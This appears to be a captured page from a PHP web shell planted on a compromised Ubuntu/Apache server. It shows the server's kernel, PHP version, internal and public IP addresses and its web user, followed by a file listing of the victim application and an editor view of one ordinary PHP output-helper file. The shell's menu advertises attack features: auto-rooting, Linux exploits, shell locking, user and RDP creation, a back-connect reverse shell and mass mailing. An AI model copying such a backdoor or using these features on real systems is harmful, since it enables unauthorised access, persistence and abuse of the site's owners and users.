Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.223.30
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
bnu /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
system
[ DIR ]
drwxr-xr-x
auto-complete.php
4.89
KB
-rwxr-xr-x
backup_restore.php
9.12
KB
-rwxr-xr-x
backupandrestore.php
10.18
KB
-rwxr-xr-x
cappcontext.php
3.19
KB
-rwxr-xr-x
cmailer_new.php
3.48
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
coutput_24042018.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
514
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.35
KB
-rwxr-xr-x
db_sync.php
7.54
KB
-rwxr-xr-x
display_custom_html.php
8.47
KB
-rwxr-xr-x
display_details_in_grid.php
71.04
KB
-rwxr-xr-x
display_details_in_grid_custom...
2.67
KB
-rwxr-xr-x
forgot_password.php
3.76
KB
-rwxr-xr-x
format.php
6.75
KB
-rwxr-xr-x
getnumword.php
6.19
KB
-rwxr-xr-x
header.php
306
B
-rwxr-xr-x
jsmin.php
10.69
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
login.php
6.76
KB
-rwxr-xr-x
mregistry.php
2.96
KB
-rwxr-xr-x
sendLoginPassword.php
3.11
KB
-rwxr-xr-x
send_mail.php
2.88
KB
-rwxr-xr-x
system_utility.php
4.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : coutput_24042018.php
<?php require_once( APP_SRC_G . "/json.php"); function fatal_error_handler($buffer) { if (ereg("(error</b>:)(.+)(<br)", $buffer, $regs) ) { $err = preg_replace("/<.*?>/","",$regs[2]); error_log($err); return "ERROR CAUGHT : " . $err; } return $buffer; } function handle_error ($errno, $errstr, $errfile, $errline) { error_log("$errstr in $errfile on line $errline"); if($errno == FATAL || $errno == ERROR) { ob_end_flush(); echo "ERROR CAUGHT check log file"; exit(0); } } class CEnvelope { public $error_code = 0; public $status = ""; public $data = NULL; } class COutput { public $mobj_jsonsvc; function Initialize() { $this->mobj_jsonsvc = new Services_JSON(); ob_start("fatal_error_handler"); set_error_handler("handle_error"); } function Render() { ob_end_flush(); } function Cancel() { ob_clean(); } function Redirect($astr_url) { if(!headers_sent()) header("Location: $astr_url"); else throw new Exception("Headers have been sent Already! Can't Redirect!"); } function ToJSONEnvelope(&$aobj_data = NULL, $aint_errorcode = 0, $astr_errormsg = "") { $lstr_result = ""; $lobj_temp = new CEnvelope(); $lobj_temp->error_code = $aint_errorcode; $lobj_temp->status = $astr_errormsg; $lobj_temp->data = $aobj_data; $lstr_result = $this->mobj_jsonsvc->encode($lobj_temp); return( $lstr_result ); } function ToJSONRaw($aobj_data = NULL) { $lstr_result = $this->mobj_jsonsvc->encode($aobj_data); return( $lstr_result ); } } ?>
Close